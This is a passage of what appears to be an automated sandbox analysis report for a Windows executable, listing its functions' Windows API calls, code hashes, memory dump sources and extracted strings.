                • Instruction ID: 99eebffffbce033fc0522e98e19b2d1234821c7ac64df180549e57082db78312
                • Opcode Fuzzy Hash: 9982c3a0811fb38fc73ca69a093f2459b29f2df4d5118985393a5a04db7b7336
                • Instruction Fuzzy Hash: 45F0FF7250CF206B8664EB68F586C9AB3EBAE85710B54AC09F404D7711CA30FC809EB4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID:
                • String ID: C:\Users\user\Desktop\tcmeimnnMZ.exe
                • API String ID: 0-1100257147
                • Opcode ID: 478df39ad37c6740a96ac578290ff891cf3a303cf2d0cec95c062bf09fa7f8ad
                • Instruction ID: 1c8e4522fb5bcd1ec17fbfe07366883c3294157c0e17d6b7e029f063c97c5c98
                • Opcode Fuzzy Hash: 478df39ad37c6740a96ac578290ff891cf3a303cf2d0cec95c062bf09fa7f8ad
                • Instruction Fuzzy Hash: AF31B171A04A65AFCB21DF99ED85DDEBBBAEB85700B11006AF400E7350D7B09E40CFA0
                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00626163,00000000,?,00638D08,?,?,?,00626306,00000004,InitializeCriticalSectionEx,00631C98,InitializeCriticalSectionEx), ref: 006261BF
                • GetLastError.KERNEL32(?,00626163,00000000,?,00638D08,?,?,?,00626306,00000004,InitializeCriticalSectionEx,00631C98,InitializeCriticalSectionEx,00000000,?,006260BD), ref: 006261C9
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 006261F1
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID: api-ms-
                • API String ID: 3177248105-2084034818
                • Opcode ID: 0e35fab2a06b2459f9fbebaf33530eb555b07dd7fdeb1ad0a8b80d96fe9230c1
                • Instruction ID: 222ff75049ca2f8a2a93b95239a875e218cc86168c6c1171c38688b0b1bc13e8
                • Opcode Fuzzy Hash: 0e35fab2a06b2459f9fbebaf33530eb555b07dd7fdeb1ad0a8b80d96fe9230c1
                • Instruction Fuzzy Hash: FEE01A34284709B6EB202B60ED0AB993A5B9B01B40F104430FA0DEC1E2DB65E9A19AD5
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: AdjustPointer
                • String ID:
                • API String ID: 1740715915-0
                • Opcode ID: add17bf5a23a13847e2a29eb88c833741e89b7527efac4ac538a4d14fbef3c11
                • Instruction ID: 66c9b6897cc5892590539e64e336b4c19f7c3bb5a186df5da33ba0c63eb2dc98
                • Opcode Fuzzy Hash: add17bf5a23a13847e2a29eb88c833741e89b7527efac4ac538a4d14fbef3c11
                • Instruction Fuzzy Hash: F2518E72602E22EFDB399F54E845BAA77A6EF54310F24412DE803562D1E731AE51CF90
                APIs
                • GetLastError.KERNEL32(?,?,?,0062C440,?,00000001,0062AD76,?,0062C8FA,00000001,?,?,?,0062AD05,?,?), ref: 0062832F
                • _free.LIBCMT ref: 0062838C
                • _free.LIBCMT ref: 006283C2
                • SetLastError.KERNEL32(00000000,00000005,000000FF,?,0062C8FA,00000001,?,?,?,0062AD05,?,?,?,00637520,0000002C,0062AD76), ref: 006283CD
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: ErrorLast_free
                • String ID:
                • API String ID: 2283115069-0
                • Opcode ID: 0c3898e7da78fb2c8de14add3ec97ff90dda4321a0875b03f9acdc3de689b001
                • Instruction ID: 58bed0e66c4fcc0edc28d1a336064808b821796374b6a75ed4b75bf9ed836514
                • Opcode Fuzzy Hash: 0c3898e7da78fb2c8de14add3ec97ff90dda4321a0875b03f9acdc3de689b001
                • Instruction Fuzzy Hash: A411027220AF316FD79462F47C85EAF271BABC1B747280A2CF620832D2DF648C094D64
                APIs
                • GetLastError.KERNEL32(?,006211AD,?,00628822,006285BF,?,?,006211AD,?), ref: 00628486
                • _free.LIBCMT ref: 006284E3
                • _free.LIBCMT ref: 00628519
                • SetLastError.KERNEL32(00000000,00000005,000000FF,?,006211AD,?,00628822,006285BF,?,?,006211AD,?), ref: 00628524
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: ErrorLast_free
                • String ID:
                • API String ID: 2283115069-0
                • Opcode ID: 072fcdc39f0b25396fea0087a73baa035ae33cb24099a0d0fd93743b44b458a8
                • Instruction ID: c33cff24ffd9bfba6ed267d631bd863ae9fd9de5710a706aab81169c3add112b
                • Opcode Fuzzy Hash: 072fcdc39f0b25396fea0087a73baa035ae33cb24099a0d0fd93743b44b458a8
                • Instruction Fuzzy Hash: E7114872209F212FD79073B4BC85EAB279B9BC13747280238F520972D2DF648C054E75
                APIs
                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0062CF35,?,00000001,?,00000001,?,0062C3CF,?,?,00000001), ref: 0062D4ED
                • GetLastError.KERNEL32(?,0062CF35,?,00000001,?,00000001,?,0062C3CF,?,?,00000001,?,00000001,?,0062C91B,0062AD05), ref: 0062D4F9
                  • Part of subcall function 0062D4BF: CloseHandle.KERNEL32(FFFFFFFE,0062D509,?,0062CF35,?,00000001,?,00000001,?,0062C3CF,?,?,00000001,?,00000001), ref: 0062D4CF
                • ___initconout.LIBCMT ref: 0062D509
                  • Part of subcall function 0062D481: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0062D4B0,0062CF22,00000001,?,0062C3CF,?,?,00000001,?), ref: 0062D494
                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0062CF35,?,00000001,?,00000001,?,0062C3CF,?,?,00000001,?), ref: 0062D51E
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                • String ID:
                • API String ID: 2744216297-0
                • Opcode ID: af0e19c5fb83486f7d4b8fcc47d99f4b3f14f2b2335377227a54eeb919fe0b01
                • Instruction ID: ce0abfca44d0d8b2a95ef6173d50f8a54e46aa7c7af3bb42c2169f496a115391
                • Opcode Fuzzy Hash: af0e19c5fb83486f7d4b8fcc47d99f4b3f14f2b2335377227a54eeb919fe0b01
                • Instruction Fuzzy Hash: 44F01C36411668BFCF222F91EC08AC93FA7FB093E4B044014FA1896120CB328860DBD4
                APIs
                • _free.LIBCMT ref: 00627C74
                  • Part of subcall function 00627FB2: HeapFree.KERNEL32(00000000,00000000,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?), ref: 00627FC8
                  • Part of subcall function 00627FB2: GetLastError.KERNEL32(?,?,00629DC0,?,00000000,?,?,?,00629DE7,?,00000007,?,?,0062A25B,?,?), ref: 00627FDA
                • _free.LIBCMT ref: 00627C87
                • _free.LIBCMT ref: 00627C98
                • _free.LIBCMT ref: 00627CA9
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: ccee2ed8e227aa3ce475482f181df98c6988c0b37052dd9ebc23b3d533e323f3
                • Instruction ID: a234a13cfa0e54cb8a8382b48c96cbfb7b9ceb5d455c76b3ef1ffd2c67da5400
                • Opcode Fuzzy Hash: ccee2ed8e227aa3ce475482f181df98c6988c0b37052dd9ebc23b3d533e323f3
                • Instruction Fuzzy Hash: DFE08C7080C9749A8B522F20BD4988A7FA7E708710742700AF86022333C7F118979FF8
                APIs
                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 006257A5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: EncodePointer
                • String ID: MOC$RCC
                • API String ID: 2118026453-2084237596
                • Opcode ID: 06323140100620bf35e995a8781f27f7c4623409fdfe24bfd4b87a42f9d4f76a
                • Instruction ID: b6dff2ed26cae04277d867016eebcffd2269114923b44b99e2c3f1f0a64a10b2
                • Opcode Fuzzy Hash: 06323140100620bf35e995a8781f27f7c4623409fdfe24bfd4b87a42f9d4f76a
                • Instruction Fuzzy Hash: F2417871900A29EFCF25DF94EC81AEEBBB6BF48300F188099F906A6251D3799950CF51
                APIs
                • GetModuleHandleA.KERNEL32(kernel32), ref: 0062111B
                • GetModuleHandleW.KERNEL32(00000000), ref: 00621162
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: HandleModule
                • String ID: kernel32
                • API String ID: 4139908857-541877477
                • Opcode ID: 7f5be8da15e10b06011a65c865f2892f6e1e8f73896fadeb6f8b562da29240d8
                • Instruction ID: 42a775b9f03255bf585adb13e14f505069eeb18d764f4ee2ab4d7cf4dcd40fda
                • Opcode Fuzzy Hash: 7f5be8da15e10b06011a65c865f2892f6e1e8f73896fadeb6f8b562da29240d8
                • Instruction Fuzzy Hash: 7A21F5B9D0061DEFCB04DFE4D849AEEBBB5AF49305F108558E905AB340E7349A40CFA1
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: Max_valueMin_value
                • String ID: [4b
                • API String ID: 3846992165-2269047744
                • Opcode ID: 8d8c36d3c597d4c958e84837b90c9a0a4b6218c908e01e2a44502771170faa6f
                • Instruction ID: 4a40c189508b00c4a3f8bf956c6f37d5fcd86bce6f15e14b8d6c3bdbc82436d6
                • Opcode Fuzzy Hash: 8d8c36d3c597d4c958e84837b90c9a0a4b6218c908e01e2a44502771170faa6f
                • Instruction Fuzzy Hash: 3E012CB5D006199FCB44EFA4E9429EEBBB5AF08300F00456DE505AB301EB38A704CF95
                APIs
                  • Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080
                • task.LIBCPMTD ref: 00622AB3
                • task.LIBCPMTD ref: 00622AC2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: task$char_traits
                • String ID: dboupzalsfzwvwpyqdpu
                • API String ID: 1455298312-2047172133
                • Opcode ID: 72b55690d93d55b6c843b4d705295199e9b2bc39724aea8d66dc24471231e1c9
                • Instruction ID: 0d7ecb3af544f3aeb1c2f11e8942f6c522fdd2d392f7df92fbbed5eb61a5c182
                • Opcode Fuzzy Hash: 72b55690d93d55b6c843b4d705295199e9b2bc39724aea8d66dc24471231e1c9
                • Instruction Fuzzy Hash: C9016971904658EBCB04DF58E951B9EBBB5FB04720F10866DF820A77C0DB796B04CB94
                APIs
                  • Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080
                • task.LIBCPMTD ref: 00622A43
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                • Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd
                Similarity
                • API ID: char_traitstask
                • String ID: S$oeislvoodubcwjonjrwnhbjfxmsna
                • API String ID: 3039116899-104439280
                • Opcode ID: 5d3bb90079fb6cbe8d6ddd32825769698df2a81a8525a90820bb562a73e71ce5
                • Instruction ID: 3f4d58c3de46e66cb383c184fec8d73ee5a53adc5d3c52f448b6a6035a2be5f2
                • Opcode Fuzzy Hash: 5d3bb90079fb6cbe8d6ddd32825769698df2a81a8525a90820bb562a73e71ce5
                • Instruction Fuzzy Hash: 48F06270D046199BDB18DFA8E6657EDB7B1EB08304F10406DD40277381DB799E08DF69